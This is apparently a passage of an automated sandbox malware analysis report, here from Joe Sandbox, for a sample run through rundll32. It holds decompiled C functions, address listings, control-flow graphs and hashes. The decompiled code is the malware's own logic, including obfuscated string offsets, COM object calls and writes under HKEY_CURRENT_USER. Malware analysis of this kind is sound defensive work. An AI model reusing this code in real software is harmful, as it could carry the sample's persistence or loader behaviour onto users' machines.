					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                                                                                                                                                                    0x031b6793
                                                                                                                                                                                                                                    0x031b6798
                                                                                                                                                                                                                                    0x031b679b
                                                                                                                                                                                                                                    0x031b67a7
                                                                                                                                                                                                                                    0x031b67af
                                                                                                                                                                                                                                    0x031b67b2
                                                                                                                                                                                                                                    0x031b6913
                                                                                                                                                                                                                                    0x031b6919
                                                                                                                                                                                                                                    0x031b67b8
                                                                                                                                                                                                                                    0x031b67c6
                                                                                                                                                                                                                                    0x031b67c9
                                                                                                                                                                                                                                    0x031b67cc
                                                                                                                                                                                                                                    0x031b67d1
                                                                                                                                                                                                                                    0x031b67da
                                                                                                                                                                                                                                    0x031b67e5
                                                                                                                                                                                                                                    0x031b67e8
                                                                                                                                                                                                                                    0x031b67ea
                                                                                                                                                                                                                                    0x031b67ef
                                                                                                                                                                                                                                    0x031b67f7
                                                                                                                                                                                                                                    0x031b6801
                                                                                                                                                                                                                                    0x031b6805
                                                                                                                                                                                                                                    0x031b6808
                                                                                                                                                                                                                                    0x031b680d
                                                                                                                                                                                                                                    0x031b6818
                                                                                                                                                                                                                                    0x031b6818
                                                                                                                                                                                                                                    0x031b680f
                                                                                                                                                                                                                                    0x031b680f
                                                                                                                                                                                                                                    0x031b6816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b6816
                                                                                                                                                                                                                                    0x031b6822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b6825
                                                                                                                                                                                                                                    0x031b6829
                                                                                                                                                                                                                                    0x031b6834
                                                                                                                                                                                                                                    0x031b6834
                                                                                                                                                                                                                                    0x031b683b
                                                                                                                                                                                                                                    0x031b6844
                                                                                                                                                                                                                                    0x031b684b
                                                                                                                                                                                                                                    0x031b6854
                                                                                                                                                                                                                                    0x031b6857
                                                                                                                                                                                                                                    0x031b685a
                                                                                                                                                                                                                                    0x031b6861
                                                                                                                                                                                                                                    0x031b6864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b6866
                                                                                                                                                                                                                                    0x031b6869
                                                                                                                                                                                                                                    0x031b686c
                                                                                                                                                                                                                                    0x031b686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b6871
                                                                                                                                                                                                                                    0x031b6880
                                                                                                                                                                                                                                    0x031b6880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b68ae
                                                                                                                                                                                                                                    0x031b68ae
                                                                                                                                                                                                                                    0x031b68b3
                                                                                                                                                                                                                                    0x031b68d2
                                                                                                                                                                                                                                    0x031b68d4
                                                                                                                                                                                                                                    0x031b68d9
                                                                                                                                                                                                                                    0x031b68da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b68b5
                                                                                                                                                                                                                                    0x031b68b5
                                                                                                                                                                                                                                    0x031b68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b68bd
                                                                                                                                                                                                                                    0x031b68bd
                                                                                                                                                                                                                                    0x031b68c2
                                                                                                                                                                                                                                    0x031b68c4
                                                                                                                                                                                                                                    0x031b68c9
                                                                                                                                                                                                                                    0x031b68ca
                                                                                                                                                                                                                                    0x031b68e0
                                                                                                                                                                                                                                    0x031b68e0
                                                                                                                                                                                                                                    0x031b68e8
                                                                                                                                                                                                                                    0x031b68f3
                                                                                                                                                                                                                                    0x031b68f6
                                                                                                                                                                                                                                    0x031b6901
                                                                                                                                                                                                                                    0x031b6903
                                                                                                                                                                                                                                    0x031b6905
                                                                                                                                                                                                                                    0x031b6908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b690e
                                                                                                                                                                                                                                    0x031b6908
                                                                                                                                                                                                                                    0x031b68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b68b3
                                                                                                                                                                                                                                    0x031b6883
                                                                                                                                                                                                                                    0x031b6885
                                                                                                                                                                                                                                    0x031b6888
                                                                                                                                                                                                                                    0x031b6889
                                                                                                                                                                                                                                    0x031b6889
                                                                                                                                                                                                                                    0x031b688d
                                                                                                                                                                                                                                    0x031b6897
                                                                                                                                                                                                                                    0x031b6897
                                                                                                                                                                                                                                    0x031b689d
                                                                                                                                                                                                                                    0x031b68a0
                                                                                                                                                                                                                                    0x031b68a0
                                                                                                                                                                                                                                    0x031b68a6
                                                                                                                                                                                                                                    0x031b68a6
                                                                                                                                                                                                                                    0x031b6923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 61ddc881da5c1044b253996b3e16b04c3ddf788f39f665264b90970e2ee64f94
                                                                                                                                                                                                                                    • Instruction ID: 09c999d10757b45502d5f2e3f88ddde0c4aba9c7c5174df49416a3b8f3002bb7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61ddc881da5c1044b253996b3e16b04c3ddf788f39f665264b90970e2ee64f94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E513A75805229ABDF18EF95EC849EEBFBCEF4D320F244156F910A6194E7709684CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B9152, Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 31b9152-31b9178 397 31b917e-31b919b call 31b3aef 395->397 398 31b9246-31b924c 395->398 401 31b923d-31b9242 397->401 402 31b91a1-31b91a6 397->402 401->398 403 31b91a8-31b91ab 402->403 404 31b91be-31b91c0 402->404 403->404 405 31b91ad-31b91bc 403->405 404->401 406 31b91c2-31b91e0 404->406 405->404 407 31b91e4-31b91e8 406->407 409 31b91ea-31b91f6 call 31b7c14 407->409 410 31b9216-31b921b 407->410 409->410 418 31b91f8-31b91fd 409->418 412 31b921d-31b921f 410->412 413 31b9223-31b922c 410->413 412->413 415 31b922e 413->415 416 31b9233-31b9236 413->416 415->416 416->401 417 31b9238 416->417 417->401 418->410 419 31b91ff-31b9202 418->419 419->410 420 31b9204-31b9214 419->420 420->410
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E031B9152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E031B3AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x31bd27c; // 0x1faa5a8
						_t20 = _t68 + 0x31be1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E031B7C14(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6; // 0x7414d5b0
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                                                                                                                                                                                                                                    0x031b9158
                                                                                                                                                                                                                                    0x031b915b
                                                                                                                                                                                                                                    0x031b916b
                                                                                                                                                                                                                                    0x031b9174
                                                                                                                                                                                                                                    0x031b9178
                                                                                                                                                                                                                                    0x031b9246
                                                                                                                                                                                                                                    0x031b924c
                                                                                                                                                                                                                                    0x031b924c
                                                                                                                                                                                                                                    0x031b9192
                                                                                                                                                                                                                                    0x031b9197
                                                                                                                                                                                                                                    0x031b919b
                                                                                                                                                                                                                                    0x031b91a1
                                                                                                                                                                                                                                    0x031b91a6
                                                                                                                                                                                                                                    0x031b91ad
                                                                                                                                                                                                                                    0x031b91bc
                                                                                                                                                                                                                                    0x031b91bc
                                                                                                                                                                                                                                    0x031b91c0
                                                                                                                                                                                                                                    0x031b91c2
                                                                                                                                                                                                                                    0x031b91ce
                                                                                                                                                                                                                                    0x031b91d9
                                                                                                                                                                                                                                    0x031b91e4
                                                                                                                                                                                                                                    0x031b91e8
                                                                                                                                                                                                                                    0x031b91f2
                                                                                                                                                                                                                                    0x031b91f6
                                                                                                                                                                                                                                    0x031b91f8
                                                                                                                                                                                                                                    0x031b91fd
                                                                                                                                                                                                                                    0x031b9204
                                                                                                                                                                                                                                    0x031b9214
                                                                                                                                                                                                                                    0x031b9214
                                                                                                                                                                                                                                    0x031b91fd
                                                                                                                                                                                                                                    0x031b91f6
                                                                                                                                                                                                                                    0x031b9216
                                                                                                                                                                                                                                    0x031b921b
                                                                                                                                                                                                                                    0x031b9220
                                                                                                                                                                                                                                    0x031b9220
                                                                                                                                                                                                                                    0x031b9226
                                                                                                                                                                                                                                    0x031b922c
                                                                                                                                                                                                                                    0x031b9231
                                                                                                                                                                                                                                    0x031b9231
                                                                                                                                                                                                                                    0x031b9236
                                                                                                                                                                                                                                    0x031b923b
                                                                                                                                                                                                                                    0x031b923b
                                                                                                                                                                                                                                    0x031b9236
                                                                                                                                                                                                                                    0x031b91c0
                                                                                                                                                                                                                                    0x031b923d
                                                                                                                                                                                                                                    0x031b9243
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: fa8a628479e99d9bd81f42c6bbff065e0cbb1f5757f4479e5b1770221c371ceb
                                                                                                                                                                                                                                    • Instruction ID: 5b6f1f8c85dd1a94131ce199bd69112c2612be512bac43703c0c994286d18f95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa8a628479e99d9bd81f42c6bbff065e0cbb1f5757f4479e5b1770221c371ceb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C312A76900119AFCB11DFA5C888CDBBB7AFFCD7407254698F9559B210E3319D92CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B269C, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 422 31b269c-31b26b0 423 31b26ba-31b26cc call 31b6b43 422->423 424 31b26b2-31b26b7 422->424 427 31b26ce-31b26d2 423->427 428 31b2720-31b272d 423->428 424->423 430 31b26d9-31b26de 427->430 429 31b272f-31b2746 428->429 433 31b2748-31b2759 429->433 434 31b2784-31b27a6 429->434 430->429 432 31b26e0-31b26f0 430->432 432->429 437 31b26f2-31b26ff 432->437 433->434 438 31b275b-31b2764 433->438 441 31b270f-31b271e 437->441 442 31b2701-31b270d call 31b2496 437->442 443 31b2766-31b2772 call 31b2496 438->443 444 31b2775-31b2778 438->444 441->429 442->441 443->444 444->434
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c398c96bd67fda83c09f11deaa58a6964855876de1a3bc22634cb1bc7b0474f3
                                                                                                                                                                                                                                    • Instruction ID: f73fb1f5ce9f92411b9bda7ad6078e0f24f7de901003c24e03c33df80a0adc7c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c398c96bd67fda83c09f11deaa58a6964855876de1a3bc22634cb1bc7b0474f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49313C75A00209EFDB19EF69D880AAEF7F9EF5C310F254469E445D7214EB30D9458B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B3AEF, Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 450 31b3aef-31b3b30 452 31b3b32-31b3b3b 450->452 453 31b3bb1-31b3bb7 450->453 454 31b3b7b-31b3b7e 452->454 455 31b3b3d-31b3b4d 452->455 456 31b3bdb 454->456 457 31b3b80-31b3b8f 454->457 463 31b3b58-31b3b70 455->463 464 31b3b4f-31b3b56 455->464 458 31b3bdd-31b3be0 456->458 466 31b3bba-31b3bd9 457->466 467 31b3b91 457->467 460 31b3b98-31b3b9a 458->460 461 31b3be2-31b3bef 458->461 465 31b3ba3-31b3ba6 460->465 468 31b3b9c 460->468 461->453 469 31b3b74-31b3b79 463->469 464->465 465->453 470 31b3ba8 465->470 466->458 467->460 468->465 469->454 469->465 470->453
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: da82bf9f315b8311fd3c4813b1fef59e24ab970767c9217d6701d6dba49fb1f0
                                                                                                                                                                                                                                    • Instruction ID: 44c23c1c6aae22e6737325cf144533eaef86e0dff59ef98831ed315a7b3714e9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da82bf9f315b8311fd3c4813b1fef59e24ab970767c9217d6701d6dba49fb1f0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44313A7A900109EFCB09DF98D5C48EEBBB9FF4C300B11886EE51AA7210E7359695CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B73FD, Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 472 31b73fd-31b7417 call 31ba72d 475 31b7419 472->475 476 31b741c-31b7435 call 31b1262 472->476 475->476 478 31b743a-31b743e 476->478 479 31b74fd-31b7502 478->479 480 31b7444-31b745e 478->480 481 31b7509-31b750f 479->481 482 31b7504 call 31b1f99 479->482 485 31b74ed-31b74ef 480->485 486 31b7464-31b7480 call 31b7cb8 480->486 482->481 487 31b74f0-31b74f5 485->487 486->487 490 31b7482-31b749b call 31b89d6 486->490 487->479 493 31b74bd-31b74eb call 31b2659 490->493 494 31b749d-31b74a4 490->494 493->487 494->493 495 31b74a6-31b74b8 call 31b89d6 494->495 495->493
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E031B73FD(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E031BA72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x31bd27c; // 0x1faa5a8
				_t4 = _t24 + 0x31bede0; // 0x5169388
				_t5 = _t24 + 0x31bed88; // 0x4f0053
				_t26 = E031B1262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					 *0x31bd0f4(_v16, 0,  &_v12);
					_t52 = __imp__; // 0x76d25520
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x31bd27c; // 0x1faa5a8
						_t11 = _t32 + 0x31bedd4; // 0x516937c
						_t48 = _t11;
						_t12 = _t32 + 0x31bed88; // 0x4f0053
						_t55 = E031B7CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x31bd27c; // 0x1faa5a8
							_t13 = _t35 + 0x31bee1e; // 0x30314549
							if(E031B89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x31bd25c - 6;
								if( *0x31bd25c <= 6) {
									_t42 =  *0x31bd27c; // 0x1faa5a8
									_t15 = _t42 + 0x31bec2a; // 0x52384549
									E031B89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x31bd27c; // 0x1faa5a8
							_t17 = _t38 + 0x31bee18; // 0x51693c0
							_t18 = _t38 + 0x31bedf0; // 0x680043
							_t40 = E031B2659(_v8, 0x80000001, _t55, _t18, _t17);
							_t45 = _t40;
							 *_t52( *0x31bd238, 0, _t55);
						}
					}
					 *_t52( *0x31bd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E031B1F99(_t54);
				}
				return _t45;
			}



















                                                                                                                                                                                                                                    0x031b73fd
                                                                                                                                                                                                                                    0x031b740d
                                                                                                                                                                                                                                    0x031b7410
                                                                                                                                                                                                                                    0x031b7417
                                                                                                                                                                                                                                    0x031b7419
                                                                                                                                                                                                                                    0x031b7419
                                                                                                                                                                                                                                    0x031b741c
                                                                                                                                                                                                                                    0x031b7421
                                                                                                                                                                                                                                    0x031b7428
                                                                                                                                                                                                                                    0x031b7435
                                                                                                                                                                                                                                    0x031b743a
                                                                                                                                                                                                                                    0x031b743e
                                                                                                                                                                                                                                    0x031b744c
                                                                                                                                                                                                                                    0x031b7452
                                                                                                                                                                                                                                    0x031b745a
                                                                                                                                                                                                                                    0x031b745e
                                                                                                                                                                                                                                    0x031b74ef
                                                                                                                                                                                                                                    0x031b74ef
                                                                                                                                                                                                                                    0x031b7464
                                                                                                                                                                                                                                    0x031b7464
                                                                                                                                                                                                                                    0x031b7469
                                                                                                                                                                                                                                    0x031b7469
                                                                                                                                                                                                                                    0x031b7470
                                                                                                                                                                                                                                    0x031b747c
                                                                                                                                                                                                                                    0x031b747e
                                                                                                                                                                                                                                    0x031b7480
                                                                                                                                                                                                                                    0x031b7482
                                                                                                                                                                                                                                    0x031b7489
                                                                                                                                                                                                                                    0x031b749b
                                                                                                                                                                                                                                    0x031b749d
                                                                                                                                                                                                                                    0x031b74a4
                                                                                                                                                                                                                                    0x031b74a6
                                                                                                                                                                                                                                    0x031b74ad
                                                                                                                                                                                                                                    0x031b74b8
                                                                                                                                                                                                                                    0x031b74b8
                                                                                                                                                                                                                                    0x031b74a4
                                                                                                                                                                                                                                    0x031b74bd
                                                                                                                                                                                                                                    0x031b74c2
                                                                                                                                                                                                                                    0x031b74c9
                                                                                                                                                                                                                                    0x031b74d9
                                                                                                                                                                                                                                    0x031b74e7
                                                                                                                                                                                                                                    0x031b74e9
                                                                                                                                                                                                                                    0x031b74e9
                                                                                                                                                                                                                                    0x031b7480
                                                                                                                                                                                                                                    0x031b74fb
                                                                                                                                                                                                                                    0x031b74fb
                                                                                                                                                                                                                                    0x031b74fd
                                                                                                                                                                                                                                    0x031b7502
                                                                                                                                                                                                                                    0x031b7504
                                                                                                                                                                                                                                    0x031b7504
                                                                                                                                                                                                                                    0x031b750f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 05857edd94165da8ec7b11502897b7f16b2162c9cc24005b5c2b9d5fdd544ab7
                                                                                                                                                                                                                                    • Instruction ID: f28e846f285acc540b208f2bc6cd5a16143d2b663535000c5db8316ffaa5da8a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05857edd94165da8ec7b11502897b7f16b2162c9cc24005b5c2b9d5fdd544ab7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C31AF75900248BFDB15EFA0EC84EEA7BBDEF8C340F1501A5F544AB264E7709A45DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B7B5D, Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 500 31b7b5d-31b7b91 502 31b7c0b-31b7c11 500->502 503 31b7b93-31b7b96 500->503 504 31b7b98-31b7bb0 call 31b908b 503->504 505 31b7bb3-31b7bcd 503->505 504->505 509 31b7bf8-31b7bfa 505->509 510 31b7bcf-31b7bd9 505->510 511 31b7bfc-31b7bfe 509->511 512 31b7c02-31b7c07 509->512 513 31b7be2-31b7be9 510->513 511->512 512->502 514 31b7beb-31b7bf0 513->514 515 31b7bf2-31b7bf4 513->515 514->509 515->509
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E031B7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x31bd27c; // 0x1faa5a8
				_t2 = _t22 + 0x31be0dc; // 0x5168684
				_t3 = _t22 + 0x31be0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x31bd15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x31bd27c; // 0x1faa5a8
						_t8 = _t36 + 0x31be3b8; // 0x5f005f
						E031B908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x31bd158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}















                                                                                                                                                                                                                                    0x031b7b6a
                                                                                                                                                                                                                                    0x031b7b6f
                                                                                                                                                                                                                                    0x031b7b7b
                                                                                                                                                                                                                                    0x031b7b81
                                                                                                                                                                                                                                    0x031b7b84
                                                                                                                                                                                                                                    0x031b7b87
                                                                                                                                                                                                                                    0x031b7b8d
                                                                                                                                                                                                                                    0x031b7b91
                                                                                                                                                                                                                                    0x031b7b96
                                                                                                                                                                                                                                    0x031b7b9c
                                                                                                                                                                                                                                    0x031b7ba4
                                                                                                                                                                                                                                    0x031b7bab
                                                                                                                                                                                                                                    0x031b7bb0
                                                                                                                                                                                                                                    0x031b7bb0
                                                                                                                                                                                                                                    0x031b7bb3
                                                                                                                                                                                                                                    0x031b7bc9
                                                                                                                                                                                                                                    0x031b7bcd
                                                                                                                                                                                                                                    0x031b7bdc
                                                                                                                                                                                                                                    0x031b7be2
                                                                                                                                                                                                                                    0x031b7be6
                                                                                                                                                                                                                                    0x031b7be9
                                                                                                                                                                                                                                    0x031b7bf5
                                                                                                                                                                                                                                    0x031b7beb
                                                                                                                                                                                                                                    0x031b7bee
                                                                                                                                                                                                                                    0x031b7bee
                                                                                                                                                                                                                                    0x031b7be9
                                                                                                                                                                                                                                    0x031b7bfa
                                                                                                                                                                                                                                    0x031b7bff
                                                                                                                                                                                                                                    0x031b7bff
                                                                                                                                                                                                                                    0x031b7c02
                                                                                                                                                                                                                                    0x031b7c08
                                                                                                                                                                                                                                    0x031b7c08
                                                                                                                                                                                                                                    0x031b7c11

                                                                                                                                                                                                                                    Memory Dump Source
